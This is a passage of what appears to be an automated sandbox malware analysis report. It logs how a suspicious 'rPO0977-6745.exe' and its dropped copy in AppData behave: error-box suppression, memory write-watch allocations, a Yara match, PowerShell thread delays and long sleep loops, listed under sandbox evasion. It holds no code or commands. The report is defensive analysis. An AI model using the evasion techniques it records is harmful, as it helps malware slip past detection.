              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: rPO0977-6745.exe PID: 1540, type: MEMORYSTR
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 2F10000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 3190000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 2FB0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 7B70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 8B70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 8E20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 9E20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 1440000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 2F20000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeMemory allocated: 2D60000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: D40000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 29F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 49F0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 8580000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 7580000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: E40000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 2790000 memory reserve | memory write watch
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeMemory allocated: 4790000 memory reserve | memory write watch
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599872Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599654Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599422Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599312Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599202Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 599093Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598983Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598758Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598656Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598542Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598436Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598328Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598218Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 598091Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597983Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597653Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597547Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597328Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597219Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597109Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 597000Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596890Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596781Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596672Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596562Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596453Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596344Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596204Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 596094Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595969Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595859Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595750Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595640Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595531Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595422Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595312Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595203Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 595094Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594984Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594875Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594765Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594656Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeThread delayed: delay time: 594547Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 922337203685477
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 600000
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599890
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599781
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599672
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599562
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599453
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599344
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599220
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 599094
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598982
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598875
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598766
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598656
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598547
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598437
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598328
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598219
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 598094
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597984
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597875
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597765
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597656
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597547
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597437
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597328
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597216
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597109
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 597000
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596890
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596781
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596660
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596516
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596357
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596241
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596140
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 596029
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595921
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595812
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595703
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595594
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595484
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595375
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595265
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595156
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 595046
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594937
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594828
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594714
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594607
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeThread delayed: delay time: 594500
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7745Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 938Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8062Jump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 869Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeWindow / User API: threadDelayed 2969Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exeWindow / User API: threadDelayed 6883Jump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeWindow / User API: threadDelayed 3230
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exeWindow / User API: threadDelayed 6619
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 6440Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7248Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7184Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7256Thread sleep time: -5534023222112862s >= -30000sJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -1844674407370954s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep count: 36 > 30Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -33204139332677172s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -600000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599872s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420Thread sleep count: 2969 > 30Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599654s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7420Thread sleep count: 6883 > 30Jump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599202s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -599093s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598983s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598758s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598542s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598436s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598218s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -598091s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597983s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597653s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597547s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597437s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597328s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597219s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597109s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -597000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596890s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596781s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596672s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596562s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596453s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596344s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596204s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -596094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595969s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595859s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595750s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595640s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595531s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595422s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595312s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595203s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -595094s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -594984s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -594875s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -594765s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -594656s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\rPO0977-6745.exe TID: 7388Thread sleep time: -594547s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 7296Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep count: 39 > 30
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -35971150943733603s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -600000s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096Thread sleep count: 3230 > 30
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599890s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8096Thread sleep count: 6619 > 30
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599781s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599672s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599562s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599453s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599344s >= -30000s
              Source: C:\Users\user\AppData\Roaming\EDyxAgkldisLe.exe TID: 8092Thread sleep time: -599220s >= -30000s
